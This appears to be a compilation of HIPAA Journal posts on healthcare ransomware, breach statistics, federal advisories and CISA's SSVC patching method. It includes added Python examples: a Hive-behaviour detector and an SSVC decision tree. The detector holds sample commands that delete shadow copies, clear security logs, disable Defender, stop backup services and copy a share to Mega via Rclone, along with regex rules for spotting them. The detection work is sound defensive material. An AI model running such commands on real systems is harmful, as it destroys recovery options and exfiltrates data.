Healthcare Cybersecurity

Healthcare Ransomware Threat High Despite Slight Downturn in Attacks in Q3

There was a slight downturn in ransomware attacks in Q3, although it is too early to tell if that downward trend will continue. Even with the reduction in attacks, ransomware is still the biggest cyber threat faced by organizations, and the attacks are among the costliest cybersecurity incidents to mitigate. Attacks on the healthcare industry continue to be conducted in high numbers, with several groups targeting the sector, even though the attacks have the potential to result in loss of life.

Guidepoint Security’s Research and Intelligence Team (GRIT) has been tracking the activity of ransomware gangs and identified 27 active ransomware groups in Q3, a slight decrease from Q2 when there were 30 groups conducting attacks. In Q3, there were 568 publicly posted ransomware victims – a 2.2% decrease from the 581 victims publicly posted in Q2. In Q3, new victims were publicly posted at a rate of 6.24 per day. Of course, there are some caveats with these findings. Some ransomware groups do not add all of their victims to their data leak sites, and some offer not to publicly release any information about an attack if the ransom is paid promptly. That said, figures published by the ransomware remediation firm Coveware indicate the number of organizations paying ransoms is declining.

The report shows that the ransomware threat is greatest in the United States, which is the most targeted country with 38.9% of total victims, followed by France (6.2%), and the United Kingdom (5.6%). Attacks in Spain increased significantly in Q3, which saw the country rise to 4th spot with 4.9% of attacks. Attacks are also being conducted more widely, with 16 countries targeted for the first time this year in Q3, and 6 of those countries targeted for the first time ever.

The most prolific ransomware groups in Q3 were LockBit, Black Basta, Hive, ALPHV, BianLian, and Vice Society, with LockBit by far the most prolific operation. LockBit is known to target the healthcare sector, and a warning about the group was recently issued by the Health Sector Cybersecurity Coordination Center (HC3). The group conducted more attacks in September than in either of the two previous months and accounted for 42% of all publicly posted victims in the quarter, increasing from 211 victims in Q2 to 235 in Q3.

Black Basta was the second most prolific group, with a 32% increase in victims in Q3, and Hive was in third place, with attacks increasing by 104% in the quarter. HC3 also recently issued a warning about Hive. Hive actively targets the healthcare industry: 12.8% of its victims are in the healthcare and public health (HPH) sector, twice LockBit's percentage of HPH sector victims. While several ransomware groups such as LockBit and Hive actively target healthcare, some choose not to attack the sector. Even so, the industry ranked third by victim count in Q3, with LockBit, Hive, and BianLian claiming the most healthcare victims. Manufacturing ranked first for publicly posted victims, with technology second.

So far this year, 44 ransomware groups have been observed conducting attacks, and there have been 1,846 publicly posted victims. Eight new ransomware operations emerged in Q3, including Sparta, which made the top 10 by number of victims; so far, all of the group's attacks have been on organizations in Spain. Two previously highly active groups, Vice Society and Quantum, saw their attacks decrease by 48% and 57% respectively in Q3.

The post Healthcare Ransomware Threat High Despite Slight Downturn in Attacks in Q3 appeared first on HIPAA Journal.

HPH Sector Warned About Lorenz Ransomware Group

The healthcare and public health sector (HPH) has been warned about the threat of ransomware attacks by the Lorenz threat group, which has conducted several attacks in the United States over the past two years, with no sign that attacks are slowing.

Lorenz ransomware is human-operated and is deployed after the threat actors have gained access to networks and have exfiltrated data. Once access to the network is gained, the group is known to customize its executable code and tailor it for each targeted organization. The Lorenz actors maintain persistence and conduct extensive reconnaissance over an extended period of time before deploying ransomware to encrypt files. The group engages in double extortion tactics, where sensitive data is exfiltrated prior to file encryption and ransom demands are issued to prevent the sale or publication of that data, in addition to payment being required to obtain the keys to decrypt files.

Many ransomware threat actors steal data and threaten to publish the stolen files on a data leak site if the ransom is not paid. Lorenz's process is unusual. If the ransom is not forthcoming after the group has attempted to engage with the victim, it tries to sell the stolen data to other threat actors and to the victim's competitors. If the ransom is still not paid, Lorenz publishes password-protected archives containing the stolen data on its data leak site. If the group is unable to monetize the stolen data, it then publishes the passwords for the archives, which allows anyone to download and read the stolen data. There have been cases where the group has maintained access to victims' networks and sold that access to other threat groups.

Lorenz engages in big game hunting, most commonly targeting large organizations, with the ransom demands typically in the range of $500,000 to $700,000. There have been no known attacks on non-enterprise targets, and the majority of victims have been English-speaking. In contrast to most other ransomware gangs, relatively little is known about this group. Methods known to have been used by the group to gain initial access to victims’ networks include phishing, compromising remote access technologies such as RDP and VPNs, exploiting unpatched vulnerabilities in software and operating systems, and conducting attacks on managed service providers (MSPs), and then pivoting to attack MSP clients.

The Health Sector Cybersecurity Coordination Center (HC3) Analyst Note includes references, known Indicators of Compromise, and other resources that can be used by network defenders to improve their defenses against Lorenz ransomware attacks.

The post HPH Sector Warned About Lorenz Ransomware Group appeared first on HIPAA Journal.

October 2022 Healthcare Data Breach Report

October was the worst month of the year to date for healthcare data breaches, with 71 breaches reported and more than 6 million records breached. In the first half of the year it looked as though 2022 would see a reduction in healthcare data breaches; that now looks increasingly unlikely. In 2021, 714 data breaches of 500 or more records were reported to the HHS' Office for Civil Rights. 594 such breaches were reported between January 1 and October 31, 2022, and with an average of 60 breaches reported each month, 2022 looks set to end with a similarly high total.

Across the 71 reported breaches, the protected health information of 6,242,589 individuals was exposed or impermissibly disclosed, with around half of that total coming from a single breach. So far this year, the records of 37,948,207 individuals have been exposed or impermissibly disclosed.

Largest Healthcare Data Breaches Reported in October

In October, 28 data breaches of 10,000 or more records were reported by HIPAA-regulated entities. The largest healthcare data breach reported in October – by some distance – was due to the use of Meta Pixel code on the website and patient portal of Advocate Aurora Health, which resulted in the impermissible disclosure of the PHI of up to 3 million patients to Meta/Facebook. Advocate Aurora Health was not alone. WakeMed Health and Hospitals reported a similar breach involving the PHI of 495,808 patients. Dozens of other healthcare providers have also used the code on their websites and lawsuits are mounting. Attorneys for Meta claim the company does not collect healthcare data without consent; however, U.S. District Judge William Orrick, who is presiding over a consolidated class action lawsuit against Meta over these impermissible disclosures, has expressed skepticism about those claims.

The data breach at SightCare Inc. was due to a hacking incident at its business associate USV Optical, a subsidiary of U.S. Vision, which also affected Nationwide Optometry. More than 700,000 records were compromised across the two reports. The third largest breach of the month, counting the reports from all affected entities as one incident, occurred at CorrectCare Integrated Health, Inc., which provides administrative services to healthcare providers that serve correctional facilities. A misconfiguration left a database exposed over the Internet, which resulted in the exposure of the PHI of at least 612,490 inmates at correctional facilities across the country.

Two more eye care providers confirmed in October that they had been affected by the ransomware attack on their EHR vendor, Eye Care Leaders. The records of at least 3,649,470 patients are now known to have been compromised in that attack.

Name of Covered Entity | State | Covered Entity Type | Individuals Affected | Type of Breach | Description
Advocate Aurora Health | WI | Healthcare Provider | 3,000,000 | Unauthorized Access/Disclosure | Website code passed patient information to Meta/Facebook
SightCare, Inc. | AZ | Health Plan | 637,999 | Hacking/IT Incident | Hacking incident at business associate (USV Optical)
OakBend Medical Center / OakBend Medical Group | TX | Healthcare Provider | 500,000 | Hacking/IT Incident | Ransomware attack
WakeMed Health and Hospitals | NC | Healthcare Provider | 495,808 | Unauthorized Access/Disclosure | Website code passed patient information to Meta/Facebook
CorrectCare Integrated Health, Inc. | KY | Business Associate | 438,713 | Unauthorized Access/Disclosure | Exposure of PHI over the Internet
Keystone Health | PA | Healthcare Provider | 235,237 | Hacking/IT Incident | Hacked network server
Louisiana Department of Public Safety and Corrections | LA | Healthcare Provider | 85,466 | Unauthorized Access/Disclosure | Exposure of PHI over the Internet (CorrectCare Integrated Health)
Urology of Greater Atlanta, LLC | GA | Healthcare Provider | 79,795 | Hacking/IT Incident | Hacking incident (no information)
Nationwide Optometry, PC | AZ | Healthcare Provider | 73,073 | Hacking/IT Incident | Hacking incident at business associate (USV Optical)
Ascension St. Vincent’s Coastal Cardiology | GA | Healthcare Provider | 71,227 | Hacking/IT Incident | Ransomware attack
Valle del Sol, Inc. | AZ | Healthcare Provider | 70,268 | Hacking/IT Incident | Hacked network server
CorrectCare Integrated Health, Inc. | KY | Business Associate | 53,496 | Unauthorized Access/Disclosure | Exposure of PHI over the Internet
FOREFRONT DERMATOLOGY, SC | WI | Healthcare Provider | 45,580 | Theft | Theft of an unencrypted portable electronic device at a business associate
VisionWeb Holdings, LLC | TX | Business Associate | 35,900 | Hacking/IT Incident | Compromised email accounts
University of Michigan/Michigan Medicine | MI | Healthcare Provider | 33,857 | Hacking/IT Incident | Compromised email accounts (phishing)
Aesthetic Dermatology Associates, PC | PA | Healthcare Provider | 33,793 | Hacking/IT Incident | Hacked network server
Choice Health Insurance LLC | SC | Business Associate | 32,064 | Hacking/IT Incident | Database exposed over the Internet (data theft confirmed)
PrimeCare Medical, Inc. | PA | Healthcare Provider | 22,254 | Unauthorized Access/Disclosure | Exposure of PHI over the Internet (CorrectCare Integrated Health)
Administrative Fund of the Detectives’ Endowment Association, Inc., Police Department City of New York | NY | Health Plan | 21,544 | Hacking/IT Incident | Compromised email accounts (phishing)
Wenco Management, LLC Health and Welfare Benefit Plan | OH | Health Plan | 20,526 | Hacking/IT Incident | Compromised email accounts
Gateway Ambulatory Surgery Center | NC | Healthcare Provider | 18,479 | Hacking/IT Incident | Compromised email accounts (phishing)
Alain A. Montiel, DDS | CA | Healthcare Provider | 17,157 | Theft | Theft of an unencrypted laptop
St Luke’s Health – Texas | TX | Healthcare Provider | 16,906 | Hacking/IT Incident | Compromised email accounts at business associate (Adelanto Healthcare Ventures)
Lifespire Services, Inc. | NY | Healthcare Provider | 15,375 | Hacking/IT Incident | Hacked network server
HH/Killeen Health System, LLC doing business as Seton Medical Center Harker Heights | TX | Healthcare Provider | 15,056 | Hacking/IT Incident | Compromised email accounts at an unspecified business associate
Massengale Eye Care | OK | Healthcare Provider | 15,000 | Hacking/IT Incident | Ransomware attack on a business associate (Eye Care Leaders)
Wisconsin Department of Health Services | WI | Health Plan | 12,358 | Unauthorized Access/Disclosure | Compromised email accounts
Somnia Pain Mgt of Kentucky | NY | Healthcare Provider | 10,848 | Hacking/IT Incident | Hacked network server

Causes of October 2022 Data Breaches

Across all industry sectors, ransomware attacks have decreased slightly this year; however, the healthcare industry continues to be a target for ransomware gangs, with Hive, LockBit 2.0, Lorenz, and the Venus ransomware gangs among those that are attacking healthcare organizations. According to Check Point Research, healthcare was the most targeted industry sector in Q3, 2022, and saw the second-highest percentage increase in attacks out of all industry sectors, with 60% more attacks than in Q3, 2021. The largest confirmed ransomware attack was on OakBend Medical Center, which saw half a million records compromised.

As has been the case for several months, hacking incidents outnumber all other types of data breaches. In October, 47 hacking incidents were reported – 66% of the month’s data breaches – and 2,025,704 records were exposed in those incidents. The average breach size was 43,100 records and the median breach size was 6,594 records. October saw an increase in unauthorized access/disclosure incidents, due in part to the data breach that occurred at CorrectCare Integrated Health that exposed the PHI of inmates of correctional facilities. 7 of the 17 reported unauthorized access/disclosure incidents were due to this incident. Unsurprisingly, given the 3 million-record data breach reported by Advocate Aurora Health, 66% of the breached records were due to unauthorized access/disclosure incidents. 4,145,396 records were compromised in these incidents. The average breach size was 243,847 records and the median breach size was 7,000 records.

There were 6 loss/theft incidents reported in October (4 theft, 2 loss), all but one of which involved portable electronic devices that had not been encrypted. 67,244 records were exposed or stolen across these incidents. The average breach size was 11,207 records and the median breach size was 1,396 records. There was also one incident involving the improper disposal of paperwork that contained the PHI of 4,245 patients.

The most common location of breached PHI was network servers, due to the high number of hacking incidents. Email accounts are also commonly targeted, with 15 incidents reported in October that involved compromised email accounts. Good password management and multifactor authentication significantly improve defenses against these attacks, although phishing attacks that bypass weaker forms of MFA, such as one-time codes that can be relayed through a proxy site and push notifications that users approve under pressure, are increasing. The increase in these attacks prompted CISA to issue guidance on implementing phishing-resistant MFA this month.

Healthcare Data Breaches by HIPAA-Regulated Entity Type

55 breaches were reported by healthcare providers in October; however, 11 of those data breaches occurred at business associates. 10 data breaches were reported by health plans, with one of those breaches occurring at a business associate. Business associates self-reported 6 breaches. The chart below shows the breaches broken down by where they occurred rather than the entity that reported the data breach.

Healthcare Data Breaches by State

Data breaches of 500 or more records were reported by HIPAA-regulated entities in 30 states, with New York the worst affected state with 11 reported breaches. This was due to a data breach at a New York-based management company that affected multiple anesthesiology service providers.

State | Number of Reported Data Breaches
New York | 11
Texas, Wisconsin | 5
Florida, New Jersey | 4
Arizona, California, Georgia, Kentucky, North Carolina, Pennsylvania, Virginia | 3
Delaware, Maryland, Oregon | 2
Colorado, Connecticut, Illinois, Indiana, Kansas, Louisiana, Maine, Michigan, Minnesota, Nebraska, New Mexico, Ohio, Oklahoma, South Carolina, Washington | 1

HIPAA Enforcement Activity in October

No HIPAA enforcement actions were announced in October by the HHS Office for Civil Rights or by state attorneys general.

The post October 2022 Healthcare Data Breach Report appeared first on HIPAA Journal.

Feds Issue Warning to HPH Sector About Aggressive Hive Ransomware Group

The Hive ransomware-as-a-service (RaaS) operation first emerged in June 2021 and has aggressively targeted the health and public health sector (HPH) and continues to do so. From June 2021 until November 2022, the group conducted attacks on more than 1,300 organizations worldwide, generating more than $100 million in ransom payments.

Victims in the HPH sector include the public health system in Costa Rica, Partnership HealthPlan of California, Memorial Health System, Missouri Delta Medical Center, Southwell, Hendry Regional Medical Center, and Lake Charles Memorial Health System, with the latter currently recovering from the attack that occurred this month. The attacks put patient safety at risk and have forced hospitals to divert ambulances, cancel surgeries, postpone appointments, and close urgent care units.

On November 17, 2022, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) issued a joint alert to the HPH sector warning about the risk of attacks and shared Indicators of Compromise (IoCs) and details of the tactics, techniques, and procedures (TTPs) used by the group, along with recommended mitigations for blocking, detecting, and mitigating attacks.

Hive has sophisticated capabilities, engages in double extortion tactics, and publicly releases stolen data on its leak site when victims refuse to pay the ransom. The group has been known to reinfect victims that have attempted to recover without paying the ransom. As a RaaS operation, affiliates are recruited to conduct attacks on behalf of the gang for a cut of the ransom payments they generate, with the affiliates having areas of expertise for gaining access to victims’ networks.

The most common methods used for initial access are single-factor logins over Remote Desktop Protocol (RDP), Virtual Private Networks (VPNs), and other remote network connection protocols; phishing emails carrying malicious attachments; and the exploitation of unpatched vulnerabilities, including CVE-2020-12812, which allows the second authentication factor to be bypassed on FortiOS SSL VPN servers, and the Microsoft Exchange Server vulnerabilities CVE-2021-31207, CVE-2021-34473, and CVE-2021-34523 (the ProxyShell chain).

Once access to networks has been gained, the group identifies processes related to backups, antivirus/anti-spyware, and file copying, and terminates those processes. Volume shadow copy services are stopped and all existing shadow copies are deleted, and Windows event logs are deleted, specifically the System, Security, and Application logs. Prior to encryption, virus definitions are removed and all portions of Windows Defender and other common antivirus programs are disabled in the system registry, and sensitive data is exfiltrated using Rclone and the cloud storage service Mega.nz. The group operates a live chat service to engage with victims and has also been known to contact victims by phone and email to discuss payment. Ransom demands can be considerable, ranging from several thousand to millions of dollars.
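
The pre-encryption sequence described above (shadow copies deleted, event logs cleared, Defender switched off in the registry, backup services stopped, Rclone pushing data to Mega) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the advisory or from HIPAA Journal: it runs a handful of command-line rules over constructed Windows process-creation records and flags a host only when several of the behaviours appear together, since any one of them alone (a shadow-copy deletion by backup software, say) is routine. The record field names (`host`, `cmdline`), the regular expressions and the threshold of three distinct rules are assumptions to tune for your own environment; the ATT&CK IDs are the standard technique identifiers for each behaviour.

```python
import re

# Constructed sample of Windows process-creation records (Security 4688 /
# Sysmon 1 style). These are not real telemetry and the field names are an
# assumption; adapt the `host`/`cmdline` keys to whatever your SIEM exports.
SAMPLE_EVENTS = [
    {"host": "ws-012", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws-012", "cmdline": "wmic shadowcopy delete"},
    {"host": "ws-012", "cmdline": "wevtutil.exe cl security"},
    {"host": "ws-012", "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "ws-012", "cmdline": "net stop VeeamBackupSvc /y"},
    {"host": "ws-012", "cmdline": r"rclone.exe copy \\FS01\Finance mega:staging --transfers 32 -q"},
    {"host": "ws-044", "cmdline": "vssadmin.exe list shadows"},          # benign admin query
    {"host": "ws-044", "cmdline": "wevtutil.exe qe application /c:5"},   # benign log read
]

# One rule per behaviour named in the advisory summary. The ATT&CK IDs are the
# standard technique IDs; the patterns are my own and should be tuned against
# your environment's baseline.
RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("event_log_clearing", "T1070.001",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(system|security|application)\b", re.I)),
    ("defender_tampering", "T1562.001",
     re.compile(r"Windows Defender.*(DisableAntiSpyware|DisableRealtimeMonitoring)|Set-MpPreference\s+-Disable", re.I)),
    ("backup_av_service_stop", "T1489",
     re.compile(r"\b(net1?(\.exe)?\s+stop|sc(\.exe)?\s+stop|taskkill(\.exe)?)\b.*(backup|veeam|acronis|sql|defend|sophos|mcafee)", re.I)),
    ("rclone_cloud_exfil", "T1567.002",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b|\bmega:", re.I)),
]

def match_rules(event):
    """Return the names of every rule whose pattern matches this event's command line."""
    cmd = event.get("cmdline", "")
    return [name for name, _tech, pattern in RULES if pattern.search(cmd)]

def score_hosts(events, threshold=3):
    """Collect distinct rule hits per host and return the hosts at or above `threshold`.

    A single shadow-copy deletion is noisy on its own; the signal is several of
    these behaviours on one host, which is the staging sequence the advisory
    describes. The threshold of 3 is an assumption, not a value from the advisory.
    """
    hits = {}
    for event in events:
        for name in match_rules(event):
            hits.setdefault(event["host"], set()).add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= threshold}

def attack_ids(rule_names):
    """Map flagged rule names to their ATT&CK technique IDs for the incident ticket."""
    lookup = {name: tech for name, tech, _pattern in RULES}
    return sorted({lookup[name] for name in rule_names})

if __name__ == "__main__":
    for host, names in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {len(names)} Hive-style behaviours {names} -> ATT&CK {attack_ids(names)}")
```

Run stand-alone, the script flags ws-012 with all five behaviours and stays silent on ws-044, whose commands only read shadow copies and logs. In production the same rules belong in a time-windowed correlation search rather than a flat scan, because the value is in the co-occurrence.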

Healthcare organizations are urged to read the joint security alert, monitor their systems using the provided IoCs, harden defenses against the identified TTPs, and implement the recommended mitigations.

The post Feds Issue Warning to HPH Sector About Aggressive Hive Ransomware Group appeared first on HIPAA Journal.

Healthcare Sees 60% YoY Increase in Cyberattacks

There was a global increase in cyberattacks in Q3, 2022, with attacks rising by 28% compared to the corresponding period last year. Organizations now experience an average of 1,130 attacks per week each, according to Check Point Research.

Education was the most extensively targeted sector in Q3, experiencing an 18% rise in attacks, followed by government/military, which saw a 20% increase. Healthcare was the third most targeted sector, with an average of 1,426 attacks per organization per week, but saw the second highest percentage increase in attacks, up 60% from 2021. Healthcare also experienced the highest number of ransomware attacks of any sector in Q3, with 1 in 42 healthcare organizations experiencing an attack, a 5% increase from Q3, 2021. This was despite an 8% global fall in ransomware attacks in Q3.

While the number of attacks has increased compared to last year, it appears that the attacks are starting to plateau, as the percentage increase is nowhere near as sharp as in 2021. Check Point suggests that this could be due to the increased investment in cybersecurity by enterprises, and the increased focus of governments on pursuing hackers and ransomware gangs and bringing them to justice.

“Hackers and attack groups have gained momentum and confidence, luring and attacking what seems to be endless targets around the globe,” wrote the researchers. In Q3, several major attacks were reported, including a cyberattack on the second largest school district in the United States – LA Unified School District. Australia has also seen more than its fair share of attacks, having experienced one of the largest data breaches in the country’s history – The attack on the telecoms company Optus, which was closely followed by a ransomware attack on Medibank – the largest health insurer in the country. The ANZ (Australia and New Zealand) region saw the highest percentage increase in cyberattacks in Q3, with a 72% increase, followed by North America, which saw a 47% increase in cyberattacks to an average of 849 attacks on organizations per week.

The increase in attacks shows how important it is to invest in cybersecurity and continuously assess and improve defenses. Check Point recommends focusing on prevention and ensuring that cybersecurity best practices are followed, rather than concentrating on threat detection once networks have been breached.

Many of these cyberattacks targeted employees, with phishing one of the most common ways that threat actors gain initial access to networks and spread ransomware and malware. It is important to ensure that employees receive adequate training, which should be provided frequently to reinforce cybersecurity best practices and train employees how to recognize and avoid threats such as phishing. Modern email filtering solutions should also be deployed that are capable of behavioral analysis of attachments to identify zero-day malware threats, through sandboxing technology. Healthcare organizations should also consider signing up for real-time threat intelligence, which can help to actively guard against zero-day phishing campaigns, as well as employ URL filtering to block access to known malicious websites.

Vulnerabilities are commonly exploited and it can be difficult for security teams to keep on top of patching and software updates. Prioritizing patching is vital to ensure that the most serious vulnerabilities are addressed first. CISA has recently published a methodology that can be adopted for improving patch management efficiency. In healthcare especially, anti-ransomware technology should be deployed that can rapidly detect signs of ransomware and uncover running mutations of known and unknown malware families by using behavioral analysis and generic rules.

The post Healthcare Sees 60% YoY Increase in Cyberattacks appeared first on HIPAA Journal.

FDA, MITRE Update Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook

In the event of a cyberattack that impacts the functionality of medical devices, a rapid and effective response is essential to ensure patient safety and the continuity of clinical operations. While healthcare organizations have practiced protocols that can be implemented immediately in the event of a natural disaster such as a hurricane, they tend to be less well prepared to deal with cybersecurity incidents. Earlier this month, Senator Mark Warner (D-VA), Chairman of the Senate Select Committee on Intelligence, published a white paper – Cybersecurity is Patient Safety – highlighting this problem, which he said is due to an outdated mode of thinking, where cybersecurity is viewed as a secondary or tertiary concern, and that is something that needs to change.

The key to a rapid recovery from a cyberattack is preparedness. Healthcare organizations need to treat cyberattacks as a primary concern and ensure they have a tried and tested plan for responding to attacks, and protocols that can be implemented immediately when a cyberattack is detected. Following the WannaCry ransomware attacks in 2017, which caused massive disruption to clinical operations, most visibly across the UK's National Health Service, and also affected medical devices in U.S. hospitals, the Food and Drug Administration (FDA) asked MITRE to develop a Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook to help hospitals and healthcare delivery organizations (HDOs) develop a cybersecurity preparedness and response framework.

According to MITRE, “[The playbook] supplements HDO emergency management and/or incident response capabilities with regional preparedness and response recommendations for medical device cybersecurity incidents.” Since the playbook was published in 2018, cyberattacks on the healthcare sector have continued to increase in number and sophistication. From the middle of 2020 to the end of 2021, 82% of healthcare systems reported a cyber incident, and 34% of those incidents were ransomware attacks. Those attacks were often sophisticated and impacted multiple IT systems, resulting in widespread disruption to business operations, and in many cases that disruption continued for weeks or months.

In light of the increase in cyberattacks and the changing threat landscape, the FDA contacted MITRE to reach out to stakeholders to identify gaps in the playbook, challenges, and additional resources that had become available since the original publication of the playbook. An updated version of the playbook has now been released.

The playbook focuses on preparedness and response for medical device cybersecurity issues that impact medical device functions, with the updated version emphasizing the importance of having a diverse team participating in cybersecurity preparedness and response exercises. Cyberattacks affect many roles across an organization, so all of them should take part in preparedness exercises: clinicians, healthcare technology management professionals, the IT team, emergency response, and risk management and facilities staff.

Version 2.0 of the playbook highlights considerations for widespread impacts and extended downtimes that are common following ransomware attacks, which benefit from the use of regional response models and partners. MITRE has also added a resource appendix that makes it easier to find tools, references, and other resources to help healthcare organizations prepare for and respond to medical device cybersecurity incidents, including ransomware attacks.

In addition to the updated Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook, a Playbook Quick Start Companion Guide has also been released, which is a shorter version of the playbook that discusses preparedness and response activities that health care organizations might want to start when developing their medical device incident response program.

It may not be possible to prevent cyberattacks, but by preparing and practicing the incident response, the severity of those attacks and the impact they have on clinical operations can be greatly reduced.

The post FDA, MITRE Update Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook appeared first on HIPAA Journal.

CISA Releases Decision Tree Methodology for Assessing and Remediating Software Vulnerabilities

CISA has issued a decision tree methodology that can be adopted by healthcare organizations to help them develop an efficient and effective vulnerability management program.

The Importance of an Efficient Patch Management Program

When it comes to vulnerability management, the best practice is to patch promptly: when software updates and patches are released, they should be applied as soon as possible, before bad actors can exploit the flaws. In practice, promptly patching every vulnerability is a major challenge given the sheer volume of patches and updates being released, and treating them all alike is not wise either, because vulnerabilities are not all equal. Some are far more likely to be exploited than others, and the impact of successful exploitation varies considerably. IT teams therefore need to prioritize, dealing with critical and actively exploited vulnerabilities first.

Healthcare organizations with mature vulnerability management programs are more likely to have efficient processes. They assess the severity of each vulnerability, the impact exploitation would have, and whether the vulnerability is being actively exploited or a proof-of-concept (PoC) exploit is in the public domain, and from that determine the likelihood of exploitation. Having assessed each vulnerability, they can prioritize patching effectively. Smaller healthcare organizations may struggle with assessing and prioritizing, and the consequences of getting it wrong can be severe: important updates may be missed, leaving the door wide open for hackers.

A Decision Tree Method for Assessing and Remediating Software Vulnerabilities

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) released guidance to help organizations prioritize patching and shared a Stakeholder-Specific Vulnerability Categorization (SSVC) vulnerability management methodology that can be adopted to ensure vulnerabilities are accurately assessed, allowing remediation efforts to be prioritized.

CISA Executive Assistant Director (EAD) Eric Goldstein explained in a recent blog post that there are three key steps needed to advance the vulnerability management ecosystem. They are:

1) To introduce greater automation into vulnerability management.

2) To make it easier for organizations to understand whether a given product is impacted by a vulnerability through widespread adoption of the Vulnerability Exploitability eXchange (VEX).

3) To help organizations more effectively prioritize vulnerability management resources through the use of SSVC, including prioritizing vulnerabilities based on CISA’s Known Exploited Vulnerabilities (KEV) catalog.

The SSVC system was developed by CISA and the Software Engineering Institute (SEI) at Carnegie Mellon University, with CISA then developing its own custom version of the SSVC for assessing and addressing vulnerabilities that affect government and critical infrastructure organizations.

The SSVC assesses each vulnerability on five decision points: exploitation status (is it being actively exploited, or is a public proof-of-concept exploit available), technical impact (whether exploitation gives partial or total control of the affected component), whether exploitation is automatable, mission prevalence (how important the affected system is to the organization's mission), and public well-being impact. The vulnerability is then placed in one of four categories:

  • Track – No immediate action is required, but the vulnerability should be tracked and reassessed if further information becomes available, with the vulnerability updated within standard timeframes.
  • Track* – No immediate action is required, but there are characteristics that require closer monitoring for changes. These vulnerabilities should be remediated within standard time frames.
  • Attend – The vulnerability requires attention from the organization’s internal, supervisory-level individuals. Necessary actions include requesting assistance or information about the vulnerability and potentially publishing a notification internally and/or externally. The vulnerability needs to be remediated sooner than standard update timelines.
  • Act – The vulnerability requires attention from the organization’s internal, supervisory-level and leadership-level individuals. Necessary actions include requesting assistance or information about the vulnerability and publishing a notification either internally and/or externally. Internal groups would meet to determine the overall response and then execute agreed-upon actions, with the vulnerability remediated as soon as possible.

CISA recommends using the SSVC alongside CISA’s Known Exploited Vulnerabilities (KEV) Catalog, the Common Security Advisory Framework (CSAF) machine-readable security advisories, and the Vulnerability Exploitability eXchange (VEX). When these are all used together, the window cyber threat actors have to exploit networks will be significantly reduced.
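To show how the five values and the KEV catalog combine into a Track / Track* / Attend / Act decision, here is an added, illustrative decision tree in Python. It is not CISA's published tree (whose exact branching is in the SSVC guide) and not HIPAA Journal's code; the folding of mission prevalence and public well-being into a single low/medium/high level, the branch conditions, and the sample findings with placeholder identifiers are all assumptions made for the example.

```python
"""Illustrative SSVC-style decision tree (added example; a simplification,
not CISA's published tree)."""
from dataclasses import dataclass
from enum import Enum


class Exploitation(Enum):
    NONE = "none"      # no public exploit, no reports of exploitation
    POC = "poc"        # proof-of-concept exploit is public
    ACTIVE = "active"  # credible reports of in-the-wild exploitation


class TechnicalImpact(Enum):
    PARTIAL = "partial"
    TOTAL = "total"    # full control of the affected component


class MissionPrevalence(Enum):
    MINIMAL = "minimal"
    SUPPORT = "support"
    ESSENTIAL = "essential"


class WellBeing(Enum):
    MINIMAL = "minimal"
    MATERIAL = "material"
    IRREVERSIBLE = "irreversible"  # e.g. harm to patient safety


PRIORITY = {"Act": 0, "Attend": 1, "Track*": 2, "Track": 3}


@dataclass(frozen=True)
class Vuln:
    vuln_id: str
    exploitation: Exploitation
    technical_impact: TechnicalImpact
    automatable: bool
    mission_prevalence: MissionPrevalence
    well_being: WellBeing
    in_kev: bool = False  # listed in CISA's KEV catalog


def mission_and_wellbeing(mp, wb):
    """Fold the two organisational values into one low/medium/high level
    (assumption: essential systems or irreversible harm always rank high)."""
    if mp is MissionPrevalence.ESSENTIAL or wb is WellBeing.IRREVERSIBLE:
        return "high"
    if mp is MissionPrevalence.MINIMAL and wb is WellBeing.MINIMAL:
        return "low"
    return "medium"


def categorize(v):
    """Return Track, Track*, Attend or Act for one vulnerability."""
    # A KEV listing is evidence of active exploitation and overrides
    # whatever exploitation status the scanner reported.
    exploitation = Exploitation.ACTIVE if v.in_kev else v.exploitation
    mw = mission_and_wellbeing(v.mission_prevalence, v.well_being)
    total = v.technical_impact is TechnicalImpact.TOTAL

    if exploitation is Exploitation.ACTIVE:
        if mw == "high":
            return "Act"
        if mw == "medium" and (v.automatable or total):
            return "Attend"
        return "Track*"
    if exploitation is Exploitation.POC:
        if v.automatable and total and mw == "high":
            return "Attend"
        if v.automatable or mw == "high":
            return "Track*"
        return "Track"
    # No known exploitation: only the worst-case combination earns closer watch.
    if v.automatable and total and mw == "high":
        return "Track*"
    return "Track"


def prioritize(vulns):
    """Order a batch of findings for patching, most urgent first."""
    decided = [(v.vuln_id, categorize(v)) for v in vulns]
    return sorted(decided, key=lambda item: PRIORITY[item[1]])


# Constructed sample findings (placeholder ids, not real CVEs).
SAMPLE_VULNS = [
    Vuln("VULN-A", Exploitation.NONE, TechnicalImpact.TOTAL, True,
         MissionPrevalence.ESSENTIAL, WellBeing.MATERIAL, in_kev=True),
    Vuln("VULN-B", Exploitation.POC, TechnicalImpact.PARTIAL, False,
         MissionPrevalence.SUPPORT, WellBeing.MINIMAL),
    Vuln("VULN-C", Exploitation.NONE, TechnicalImpact.TOTAL, True,
         MissionPrevalence.ESSENTIAL, WellBeing.IRREVERSIBLE),
    Vuln("VULN-D", Exploitation.ACTIVE, TechnicalImpact.PARTIAL, False,
         MissionPrevalence.MINIMAL, WellBeing.MINIMAL),
    Vuln("VULN-E", Exploitation.ACTIVE, TechnicalImpact.TOTAL, False,
         MissionPrevalence.SUPPORT, WellBeing.MINIMAL),
]

if __name__ == "__main__":
    for vuln_id, decision in prioritize(SAMPLE_VULNS):
        print(f"{vuln_id}: {decision}")
```

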